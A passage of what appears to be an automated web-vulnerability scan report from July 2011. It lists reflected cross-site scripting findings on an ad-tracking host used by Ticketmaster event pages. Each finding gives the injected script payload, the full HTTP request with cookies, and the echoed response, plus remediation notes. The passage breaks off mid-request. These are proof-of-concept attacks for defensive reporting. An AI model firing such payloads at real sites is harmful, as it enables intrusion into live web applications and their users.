GET /2/ticketmaster85730"><script>alert(1)</script>f252ad4c94c/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 336
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster85730"><script>alert(1)</script>f252ad4c94c/ZAP/1178896253/x01/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.54. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dad46"><script>alert(1)</script>3c85ca57b59 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster/ZAPdad46"><script>alert(1)</script>3c85ca57b59/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:20 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 395
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/ZAPdad46"><script>alert(1)</script>3c85ca57b59/L12/947680874/x01/USNetwork/Ticketmaster_DumpCampaign/1x1Pixel.gif/72634857383031536e39414143615847?x" target="_blank">
...[SNIP]...

4.55. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8b26"><script>alert(1)</script>27080269c9d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster/ZAP/1@x01e8b26"><script>alert(1)</script>27080269c9d?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 328
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/ZAP/1439981957/x01e8b26"><script>alert(1)</script>27080269c9d/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.56. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_artistid_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_artistid_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8408b'-alert(1)-'670ae3e33cf was submitted in the _RM_HTML_artistid_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=13082498408b'-alert(1)-'670ae3e33cf&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
e='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='13082498408b'-alert(1)-'670ae3e33cf';
var majorcatid='10001';
var minorcatid='1';

// For Purchase Tracking
var b3_d = new Image (1,1);
var b3_e = new Image (1,1);
var b3_f = new Image (1,1);
var b3_g = new Image (1,1);
var b
...[SNIP]...

4.57. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_bstate_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_bstate_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74593'-alert(1)-'8932d5799 was submitted in the _RM_HTML_bstate_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=74593'-alert(1)-'8932d5799&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38439
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='74593'-alert(1)-'8932d5799';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1';

// For Purchase Tracking
var b3
...[SNIP]...

4.58. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_bzip_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_bzip_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35295'-alert(1)-'a3368e69539 was submitted in the _RM_HTML_bzip_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=35295'-alert(1)-'a3368e69539&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
;
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='35295'-alert(1)-'a3368e69539';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1';

// For Purchase Tracking
var b3_d = new Image
...[SNIP]...

4.59. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_confcode_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_confcode_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a9a8'-alert(1)-'30c8d0703c7 was submitted in the _RM_HTML_confcode_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=7a9a8'-alert(1)-'30c8d0703c7&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:29 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
e_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='7a9a8'-alert(1)-'30c8d0703c7';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='1
...[SNIP]...

4.60. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_country_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_country_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d062'-alert(1)-'cd41cc7dc96 was submitted in the _RM_HTML_country_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=7d062'-alert(1)-'cd41cc7dc96&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
